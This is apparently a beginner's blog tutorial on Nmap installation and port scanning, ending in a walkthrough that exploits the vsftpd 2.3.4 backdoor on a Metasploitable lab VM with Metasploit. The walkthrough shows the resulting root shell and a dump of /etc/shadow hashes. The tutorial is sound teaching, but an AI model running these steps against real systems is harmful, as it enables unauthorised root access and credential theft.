Getting Started with Nmap for Port Scanning and Using Metasploit

Hacking Basics 101

Zaid Mukaddam
·Nov 2, 2021·

10 min read

Getting Started with Nmap for Port Scanning and Using Metasploit

Subscribe to my newsletter and never miss my upcoming articles

Play this article

NMAP

Nmap (Network Mapper) is an open source command-line tool for scanning networks and vulnerability discovery. It an be used to identify devices running on your systems, detect operating systems running on network devices, and to find open ports and detect security risks. There are a lot of different ways to apply Nmap in different situations: security auditing, recon in a red team operation, troubleshooting for IT professionals, and more. At its heart, though, Nmap is a port scanning tool.

Basically Nmap sends out packets that come back with IP addresses and other data that will tell you which ports are open, closed, or filtered as well as other information depending on the parameters used.

Installation

If you're using an operating system pre-built for hacking/pentesting like Kali Linux, Nmap should already be installed. If you don't have it installed, run these commands depending on the operating system and package manager you are using.

RPM (Red Hat, Fedora, Suse, etc.)
You can check out the full documentation for RPM-based distributions, or use the following commands:

rpm -vhU https://nmap.org/dist/nmap-7.92-1.x86_64.rpm
rpm -vhU https://nmap.org/dist/zenmap-7.92-1.noarch.rpm
rpm -vhU https://nmap.org/dist/ncat-7.92-1.x86_64.rpm
rpm -vhU https://nmap.org/dist/nping-0.7.92-1.x86_64.rpm

Snap Package
To install Nmap on Fedora as a snap package, first install snap if you don't have it installed already by running a command such as:

sudo dnf install snapd

or:

sudo apt install snapd

depending on your distribution's package manager.

After installing snap, you'll want to either restart your system or log out and back in again to ensure everything installed and updated correctly. Then run the command:

sudo snap install nmap

Fedora
Run the following command to install Nmap on Fedora using dnf:

sudo dnf install nmap

CentOS
Run the following command to install Nmap using yum:

yum install nmap

Debian-based Distributions
To install Nmap on Debian-based distributions (Debian, Ubuntu, Pop OS, etc.) using apt, run the following command:

sudo apt-get install nmap

Arch-based Distributions
To install Nmap on Arch or Arch-based distributions, you'll need to make sure you have the "extra" software repository set up. If you need to enable this repository, open your /etc/pacman.conf file using the Nano text editor in your terminal:

sudo nano -w /etc/pacman.conf

Look through the file until you find the "extra" software repository information and uncomment it by deleting the # symbol at the beginning of each line. After you're done, save with Ctrl+O and exit with Ctrl+X. You'll then need to re-sync the Pacman package manager by running the following command:

sudo pacman -Syy

You can then install Nmap by running:

sudo pacman -S nmap

OpenSUSE

Run the following command to install Nmap on OpenSUSE using zypper:

zypper install nmap

Installing from Source Code If you need to or want to install Nmap from source code, first use wget to download the source code:

wget https://nmap.org/dist/nmap-7.92.tar.bz2

Then extract the code:

bzip2 -cd nmap-7.92.tar.bz2 | tar xvf -

Compile the program using configure and make:

./configure
make

Then install Nmap:

sudo make install

Getting Started

The basic use of Nmap involves running the command nmap in a terminal followed by the target's IP address and any of the available parameters. Depending on the parameters you use, you can scan for open ports and/or have Nmap guess the target's operating system among other things.

Port Scanning The simplest way to scan ports on a remote system is to simply run:

nmap [IP address of system you want to scan]

You can also specify a target with a URL instead of IP address:

nmap [URL you want to scan]

To scan a range of IP addresses, use a hyphen. For example, this command would scan everything from 192.168.0.1 to 192.168.0.50:

nmap 192.168.0.1-50

To run Nmap on a subnet just use a forward slash. For example:

nmap 192.168.0.1/15

You can scan targets from a text file by using the -iL switch followed by the text file name:

nmap -iL list.txt

To scan a specific port, you want to use the -p switch followed by the port number followed by the target's IP address. For example:

nmap -p 80 192.168.0.1

You can also use the same switch to scan a certain range of ports using a hyphen. For example, to scan ports 1 to 200 you could run:

namp -p 1-200 192.168.0.1

The switch -F is for "fast" and scans the most common ports. Using the same IP address for our example:

nmap -F 192.168.0.1

To scan all ports (1-65535), you use the -p switch with another hypen, making it -p-:

namp -p- 192.168.0.1

You can also scan using TCP connect, which takes longer, but is also more lilkely to connect:

nmap -sT 192.168.0.1

Detecting the Target's Operating System
In addition to port scanning, a common use of Nmap is to detect the target's operating system and operating system version. Knowing the version of the operating system can be useful because if the target is running an out of date operating system, you can then research the known vulnerabilities for that OS version. You use the -O switch for remote OS detection and the -sV switch to find the system version. The basic command for standard service detection is:

nmap -sV 192.168.0.1

You can also run a more aggressive OS scan against the target. The downside to this is that it is noisy and leaves a larger footprint on the network, and ideally you would want to scan as silently as possible. To run an aggressive scan use the -A switch which enables OS detection, version detection, script scanning, and traceroute:

nmap -A 129.168.0.1

For more aggressive service detection, use the -sV switch followed by --version-intensity 5:

nmap -sV --version-intensity 5 192.168.0.1

Using NMAP to scan for vulnerabilities in Metasploitable VM

image.png

Firstly, Let's do a Nmap Scan on the VM's IP address. The Metasploitable VM is running on 192.168.163.130.

┌──(zaid㉿DESKTOP-SNN2HMG)-[~]
└─$ nmap -sV 192.168.163.130
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-02 11:56 IST
Nmap scan report for 192.168.163.130
Host is up (0.014s latency).
Not shown: 977 closed tcp ports (conn-refused)
PORT     STATE SERVICE      VERSION
21/tcp   open  ftp          vsftpd 2.3.4
22/tcp   open  ssh          OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet       Linux telnetd
25/tcp   open  smtp         Postfix smtpd
53/tcp   open  domain       ISC BIND 9.4.2
80/tcp   open  http         Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind      2 (RPC #100000)
139/tcp  open  netbios-ssn  Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn  Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp  open  exec         netkit-rsh rexecd
513/tcp  open  login?
514/tcp  open  shell?
1099/tcp open  java-rmi     GNU Classpath grmiregistry
1524/tcp open  bindshell    Metasploitable root shell
2049/tcp open  nfs          2-4 (RPC #100003)
2121/tcp open  ccproxy-ftp?
3306/tcp open  mysql        MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql   PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc          VNC (protocol 3.3)
6000/tcp open  X11          (access denied)
6667/tcp open  irc          UnrealIRCd
8009/tcp open  ajp13        Apache Jserv (Protocol v1.3)
8180/tcp open  http         Apache Tomcat/Coyote JSP engine 1.1
Service Info: Hosts:  metasploitable.localdomain,  
irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
 https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 164.53 seconds

After Seeing all the open ports, let's focus on the port 21.

Port 21 is running ftp service on a TCP state.
But here it also shows the version of the ftp service

PORT     STATE SERVICE      VERSION
21/tcp   open  ftp          vsftpd 2.3.4

Let's see what we get on Searching the version on Google image.png

Searching on Google makes it clear that this version of ftp service can be exploited easily using a backdoor. image.png

Starting Metasploit

You can read this article by kali.org for installing and starting metasploit - starting metasploit

┌──(zaid㉿DESKTOP-SNN2HMG)-[~]
└─$ msfconsole

      .:okOOOkdc'           'cdkOOOko:.
    .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.
   :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:
  'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
  oOOOOOOOO.    .oOOOOoOOOOl.    ,OOOOOOOOo
  dOOOOOOOO.      .cOOOOOc.      ,OOOOOOOOx
  lOOOOOOOO.         ;d;         ,OOOOOOOOl
  .OOOOOOOO.   .;           ;    ,OOOOOOOO.
   cOOOOOOO.   .OOc.     'oOO.   ,OOOOOOOc
    oOOOOOO.   .OOOO.   :OOOO.   ,OOOOOOo
     lOOOOO.   .OOOO.   :OOOO.   ,OOOOOl
      ;OOOO'   .OOOO.   :OOOO.   ;OOOO;
       .dOOo   .OOOOocccxOOOO.   xOOd.
         ,kOl  .OOOOOOOOOOOOO. .dOk,
           :kk;.OOOOOOOOOOOOO.cOk:
             ;kOOOOOOOOOOOOOOOk:
               ,xOOOOOOOOOOOx,
                 .lOOOOOOOl.
                    ,dOd,
                      .


       =[ metasploit v6.1.11-dev                          ]
+ -- --=[ 2173 exploits - 1150 auxiliary - 398 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Use sessions -1 to interact with the
last opened session

Reading the exploit article from above image we can start by the setup for the exploitation

msf6 > use exploit/unix/ftp/vsftpd_234_backdoor

Now, let's see the options offered by this exploit

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Usin
                                      g-Metasploit
   RPORT   21               yes       The target port (TCP)


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(unix/ftp/vsftpd_234_backdoor) >

The RHOSTS is not set yet. Let's set the VM's IP Address as the RHOSTS variable and check if its updated

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhost 192.168.163.130
rhost => 192.168.163.130
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  192.168.163.130  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Usin
                                      g-Metasploit
   RPORT   21               yes       The target port (TCP)


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >

Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(unix/ftp/vsftpd_234_backdoor) >

Now it's Hacking TIME!!! Let's Start the exploit!!

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 192.168.163.130:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.163.130:21 - USER: 331 Please specify the password.
[+] 192.168.163.130:21 - Backdoor service has been spawned, handling...
[+] 192.168.163.130:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (172.20.200.87:44749 -> 192.168.163.130:6200 ) at 2021-11-01 12:49:33 +0530

ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz

We are IN!!!
Let's try getting into the shell interface

shell
[*] Trying to find binary 'python' on the target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary 'bash' on the target machine
[*] Found bash at /bin/bash

root@metasploitable:/#

Now, let's try some basic linux commands. So let's check the OS information using

root@metasploitable:/# lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 8.04
Release:        8.04
Codename:       hardy
root@metasploitable:/#

Now listing all the hashed passwords from /etc/shadow

root@metasploitable:/# cat /etc/shadow
cat /etc/shadow
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
sync:*:14684:0:99999:7:::
games:*:14684:0:99999:7:::
man:*:14684:0:99999:7:::
lp:*:14684:0:99999:7:::
mail:*:14684:0:99999:7:::
news:*:14684:0:99999:7:::
uucp:*:14684:0:99999:7:::
proxy:*:14684:0:99999:7:::
www-data:*:14684:0:99999:7:::
backup:*:14684:0:99999:7:::
list:*:14684:0:99999:7:::
irc:*:14684:0:99999:7:::
gnats:*:14684:0:99999:7:::
nobody:*:14684:0:99999:7:::
libuuid:!:14684:0:99999:7:::
dhcp:*:14684:0:99999:7:::
syslog:*:14684:0:99999:7:::
klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::
sshd:*:14684:0:99999:7:::
msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:14684:0:99999:7:::
bind:*:14685:0:99999:7:::
postfix:*:14685:0:99999:7:::
ftp:*:14685:0:99999:7:::
postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:14685:0:99999:7:::
mysql:!:14685:0:99999:7:::
tomcat55:*:14691:0:99999:7:::
distccd:*:14698:0:99999:7:::
user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::
service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::
telnetd:*:14715:0:99999:7:::
proftpd:!:14727:0:99999:7:::
statd:*:15474:0:99999:7:::
root@metasploitable:/#

The Background of the Metasploit Exploit(VSFTP)

VSFPT is an ftp server program.

Version 2.3.4 of vsftp contained a backdoor that was slipped into the servers hosting the source code by an unknown person. The particular version of VSFTP included on the Metasploitable virtual machine contains a vulnerability that opens a backdoor shell. If a client attempts to connect using a username that ends in a smiley :), it opens a backdoor shell listening on port 6200. (Kind of like 2600 - get it?)

This allows the user to obtain a root shell, view the contents of files, modify things, etc., all by attempting to login with a username ending in :). (Note that the login attempt DOES NOT have to be successful!)

The original blog post about this issue: scarybeastsecurity.blogspot.com/2011/07/ale..

Pastebin containing backdoor code that was inserted: pastebin.com/AetT9sS5

Rapid7 exploit information: rapid7.com/db/modules/exploit/unix/ftp/vsft..

Conclusion

The examples provided here are only the beginning. They provide a basic foundation for using Nmap for port scanning and OS detection, but there are so many more things Nmap can be used for. After gaining an understanding of the commands and usages demonstrated in this article, you can further your knowledge by learning how to use Nmap for other things like getting HTTP service information, getting more information about an IP address, using NSE scripts, and more.

Thanks for reading!!

Hope you learned something new today!

Don't hesitate to comment below to raise any queries or suggestions.

Will see you guys very very soon!! :)

 
Share this